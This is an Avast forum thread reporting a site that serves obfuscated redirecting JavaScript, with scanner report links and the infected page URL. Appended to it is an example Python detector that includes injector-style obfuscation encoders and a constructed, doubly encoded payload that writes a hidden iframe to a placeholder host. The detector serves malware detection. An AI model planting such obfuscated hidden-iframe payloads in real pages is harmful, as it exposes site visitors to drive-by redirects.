Avast WEBforum

Other => Viruses and worms => Topic started by: polonus on February 05, 2012, 06:33:13 PM

Title: Infected javascript undetected?
Post by: polonus on February 05, 2012, 06:33:13 PM
This is the url scan at VT: https://www.virustotal.com/url/acdc0c4b4bfcccf522501ba4685fd93c3ff03c83bbdf033fb071b1903f10e105/analysis/1328461510/
Here the script flagged at unmasked parasites: http://www.UnmaskParasites.com/security-report/?page=zavesata.com/page.php%3F158%3Ascript11%3D
Given clean: http://siteinspector.comodo.com/public/reports/228166
No alerts at urlquery.net: http://urlquery.net/report.php?id=19241
Suspicious at wepawet: http://wepawet.iseclab.org/view.php?hash=a5308ea80bc71e943af34a21c947ae51&t=1328462395&type=js
Trojan downloader not detected by avast? re: http://vscan.urlvoid.com/analysis/4c684bd1136f332144cbfe96101352dc/cGFnZS1waHA=/
DrWeb url scanner detects: -http://zavesata.com/page.php?158:script11=/JSTAG_2[7a29][dce] infected with VBS.Psyme.377
Bitdefender TrafficLight also flags the site as malware site.

reported to virus AT avast dot com,

polonus
Title: Re: Infected javascript undetected?
Post by: !Donovan on February 05, 2012, 06:48:56 PM
The PHP page is very nasty indeed, Polonus.

I'll PM you about what I found, it can't be discussed here.
Title: Re: Infected javascript undetected?
Post by: polonus on February 05, 2012, 09:29:05 PM
Hi Donovansrb10,

No, we won't touch any details of this, but here are a few general remarks on this redirecting malcode.
This is a variant on the so-called Media Temple Malware Issue. The method has been with us for quite some time now. Those redirecting domains, encoded inside a JS file, may differ. Also, the methods have become more and more refined. See the malware description here:
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanClicker%3AJS%2FIframe.F&ThreatID=-2147335922
Well, the suspicious obfuscated inline script pattern should stand out for detection, and avast webshield really should detect this as JS:Downloader-IR[Trj]. About the plug-in vulnerability on this site, see: http://e107.org/e107_plugins/forum/forum_viewtopic.php?139119 (link source = e107 Content management system forum, post author = CSDave),

polonus
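The kind of "obfuscated inline script pattern" the thread says should stand out: redirect domains hidden inside an eval()'d unescape('%XX…') or String.fromCharCode(…) string that, once decoded, writes a hidden iframe. The following is an added example of a static heuristic scanner for that pattern; it is not code from the thread, from avast, or from any of the scanners linked above, and it is not a signature for the sample discussed. The encoder helpers, the payload, and the domain redirect.invalid are all constructed for the example.

```python
"""Static heuristic scan for obfuscated inline-script redirectors.

Added example, not code from the forum thread or from avast. Every
sample below is constructed for the example; the domain
redirect.invalid is a placeholder, not a real redirect target.
"""
import re

# Indicators checked on the raw script, before any decoding.
EVAL_SINK = re.compile(r"\b(?:eval|setTimeout|Function)\s*\(")
DECODER_CALL = re.compile(
    r"\b(?:unescape|decodeURIComponent|atob)\s*\(|String\.fromCharCode\s*\(")
PERCENT_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}){8,}")          # long %XX run
CHARCODE_CALL = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")
PERCENT_ESC = re.compile(r"%([0-9a-fA-F]{2})")

# Indicators checked on the decoded script.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
IFRAME_SRC = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
IFRAME_HIDDEN = re.compile(
    r"\b(?:width|height)\s*=\s*['\"]?[01](?:px)?\b"
    r"|visibility\s*:\s*hidden|display\s*:\s*none", re.I)


def peel_layer(script: str) -> str:
    """Undo one layer of the two encoders commonly wrapped in eval():
    String.fromCharCode(n, n, ...) first, otherwise unescape('%XX%XX...')."""
    peeled = CHARCODE_CALL.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
        script)
    if peeled != script:
        return peeled
    return PERCENT_ESC.sub(lambda m: chr(int(m.group(1), 16)), script)


def scan(script: str, max_layers: int = 5) -> dict:
    """Return indicator flags, number of peeled layers, iframe targets, verdict."""
    f = {
        "eval_sink": bool(EVAL_SINK.search(script)),
        "decoder": bool(DECODER_CALL.search(script)),
        "long_escape_run": bool(PERCENT_RUN.search(script) or CHARCODE_CALL.search(script)),
        "layers": 0,
        "hidden_iframe": False,
        "iframe_src": [],
    }
    current = script
    for _ in range(max_layers):          # peel nested layers until nothing changes
        peeled = peel_layer(current)
        if peeled == current:
            break
        current, f["layers"] = peeled, f["layers"] + 1
    for tag in IFRAME_TAG.finditer(current):
        src = IFRAME_SRC.search(tag.group(0))
        if src:
            f["iframe_src"].append(src.group(1))
        if IFRAME_HIDDEN.search(tag.group(0)):
            f["hidden_iframe"] = True
    obfuscated_eval = f["eval_sink"] and f["decoder"] and f["long_escape_run"]
    f["verdict"] = "suspicious" if (f["hidden_iframe"] or obfuscated_eval) else "clean"
    return f


# --- constructed samples (encoders mimic the injector, for test input only) ---
def encode_unescape(plain: str) -> str:
    """Wrap text the way an unescape()-based injector does."""
    return "eval(unescape('" + "".join("%%%02x" % ord(c) for c in plain) + "'))"


def encode_charcode(plain: str) -> str:
    """Wrap text the way a fromCharCode-based injector does."""
    return "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in plain) + "))"


PAYLOAD = ("document.write(\"<iframe src='http://redirect.invalid/in.php' "
           "width=1 height=1 style='visibility:hidden'></iframe>\")")
SAMPLE_NESTED = encode_charcode(encode_unescape(PAYLOAD))   # two encoding layers
SAMPLE_CLEAN = "document.getElementById('nav').style.display = 'block';"

if __name__ == "__main__":
    for name, sample in (("nested", SAMPLE_NESTED), ("clean", SAMPLE_CLEAN)):
        print(name, scan(sample))
```

The verdict deliberately requires either a decoded hidden iframe or the full eval + decoder + long escape run combination, so a page that merely calls unescape() on a short string is not flagged; peeling is static string substitution only, so no script is executed while scanning.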